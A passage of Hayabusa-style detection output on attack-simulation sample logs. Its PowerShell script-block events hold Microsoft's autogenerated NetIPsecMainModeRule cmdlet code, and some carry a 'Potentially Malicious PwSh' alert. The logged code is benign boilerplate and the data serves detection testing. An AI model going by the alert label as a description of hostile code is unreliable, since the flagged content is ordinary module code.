[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } 
Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { 
[CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [Validate",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] 